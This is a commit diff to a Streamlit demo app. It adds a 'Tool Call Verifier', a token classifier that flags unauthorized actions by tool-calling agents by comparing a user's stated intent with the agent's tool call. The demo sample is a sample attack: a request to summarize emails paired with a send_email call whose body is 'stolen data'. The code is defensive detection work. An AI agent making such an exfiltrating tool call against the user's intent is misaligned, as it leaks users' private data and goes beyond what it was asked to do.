bitliu committed on
Commit
5f5c5b7
·
1 Parent(s): 1ba6507

Signed-off-by: bitliu <[email protected]>

Files changed (1) hide show
  1. app.py +69 -4
app.py CHANGED
@@ -100,9 +100,12 @@ MODELS = {
100
  "🔍 Tool Call Verifier": {
101
  "id": "llm-semantic-router/toolcall-verifier",
102
  "description": "Token-level verification of tool calls to detect unauthorized actions. Stage 2 defense for tool-calling agents.",
103
- "type": "token_simple",
104
  "labels": None,
105
- "demo": '{"action": "send_email", "to": "[email protected]", "subject": "Exfiltrated data"}',
 
 
 
106
  },
107
  }
108
 
@@ -239,6 +242,36 @@ def classify_tokens_simple(text: str, model_id: str) -> list:
239
  return entities
240
 
241
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
242
  def create_highlighted_html(text: str, entities: list) -> str:
243
  """Create HTML with highlighted entities."""
244
  if not entities:
@@ -335,7 +368,22 @@ def main():
335
  value=demo["followup"],
336
  placeholder="Enter the user's follow-up message...",
337
  )
338
- text_input = None # Not used for dialogue models
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
339
  else:
340
  # Standard text input for other models
341
  text_input = st.text_area(
@@ -344,7 +392,7 @@ def main():
344
  height=120,
345
  placeholder="Type your text here...",
346
  )
347
- query_input = response_input = followup_input = None
348
 
349
  st.markdown("---")
350
 
@@ -378,6 +426,23 @@ def main():
378
  "followup": followup_input,
379
  },
380
  }
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
381
  elif not text_input.strip():
382
  st.warning("Please enter some text to analyze.")
383
  else:
 
100
  "🔍 Tool Call Verifier": {
101
  "id": "llm-semantic-router/toolcall-verifier",
102
  "description": "Token-level verification of tool calls to detect unauthorized actions. Stage 2 defense for tool-calling agents.",
103
+ "type": "toolcall_verifier",
104
  "labels": None,
105
+ "demo": {
106
+ "user_intent": "Summarize my emails",
107
+ "tool_call": '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}',
108
+ },
109
  },
110
  }
111
 
 
242
  return entities
243
 
244
 
245
+ def classify_toolcall_verifier(
246
+ user_intent: str, tool_call: str, model_id: str
247
+ ) -> tuple:
248
+ """Classify tool call verification with special format."""
249
+ tokenizer, model = load_model(model_id, "token")
250
+ id2label = model.config.id2label
251
+
252
+ # Format input as per model requirements
253
+ input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
254
+
255
+ inputs = tokenizer(
256
+ input_text, return_tensors="pt", truncation=True, max_length=2048
257
+ )
258
+
259
+ with torch.no_grad():
260
+ outputs = model(**inputs)
261
+ predictions = torch.argmax(outputs.logits, dim=-1)[0].tolist()
262
+
263
+ # Get tokens and labels
264
+ tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
265
+ labels = [id2label[pred] for pred in predictions]
266
+
267
+ # Find unauthorized tokens
268
+ unauthorized_tokens = [
269
+ (tokens[i], labels[i]) for i in range(len(tokens)) if labels[i] == "UNAUTHORIZED"
270
+ ]
271
+
272
+ return input_text, tokens, labels, unauthorized_tokens
273
+
274
+
275
  def create_highlighted_html(text: str, entities: list) -> str:
276
  """Create HTML with highlighted entities."""
277
  if not entities:
 
368
  value=demo["followup"],
369
  placeholder="Enter the user's follow-up message...",
370
  )
371
+ text_input = user_intent_input = tool_call_input = None
372
+ elif model_config["type"] == "toolcall_verifier":
373
+ # Tool call verifier needs user intent and tool call
374
+ demo = model_config["demo"]
375
+ user_intent_input = st.text_input(
376
+ "👤 User Intent:",
377
+ value=demo["user_intent"],
378
+ placeholder="Enter the user's original intent...",
379
+ )
380
+ tool_call_input = st.text_area(
381
+ "🔧 Tool Call JSON:",
382
+ value=demo["tool_call"],
383
+ height=120,
384
+ placeholder="Enter the tool call JSON to verify...",
385
+ )
386
+ text_input = query_input = response_input = followup_input = None
387
  else:
388
  # Standard text input for other models
389
  text_input = st.text_area(
 
392
  height=120,
393
  placeholder="Type your text here...",
394
  )
395
+ query_input = response_input = followup_input = user_intent_input = tool_call_input = None
396
 
397
  st.markdown("---")
398
 
 
426
  "followup": followup_input,
427
  },
428
  }
429
+ elif model_config["type"] == "toolcall_verifier":
430
+ if not user_intent_input.strip() or not tool_call_input.strip():
431
+ st.warning("Please fill in both user intent and tool call fields.")
432
+ else:
433
+ with st.spinner("Analyzing..."):
434
+ input_text, tokens, labels, unauthorized = classify_toolcall_verifier(
435
+ user_intent_input, tool_call_input, model_config["id"]
436
+ )
437
+ st.session_state.result = {
438
+ "type": "toolcall_verifier",
439
+ "input_text": input_text,
440
+ "tokens": tokens,
441
+ "labels": labels,
442
+ "unauthorized": unauthorized,
443
+ "user_intent": user_intent_input,
444
+ "tool_call": tool_call_input,
445
+ }
446
  elif not text_input.strip():
447
  st.warning("Please enter some text to analyze.")
448
  else: